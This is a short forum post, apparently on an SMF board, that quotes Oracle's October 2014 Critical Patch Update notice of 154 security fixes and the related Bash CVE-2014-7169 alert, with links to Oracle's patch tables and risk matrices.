- http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html
Oct 14, 2014 - "... This Critical Patch Update contains -154- new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at:
- https://blogs.oracle.com/security/entry/october_2014_critical_patch_update
Please note that on September 26, 2014, Oracle released a Security Alert for CVE-2014-7169 "Bash"* and other publicly disclosed vulnerabilities affecting GNU Bash. Customers of affected Oracle products are strongly advised to apply the fixes that were announced in the Security Alert for CVE-2014-7169..."
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html

Patch Availability Table
- http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#PIN

October 2014 Risk Matrices
- http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html


Powered by SMF 1.1.20 | SMF © 2013, Simple Machines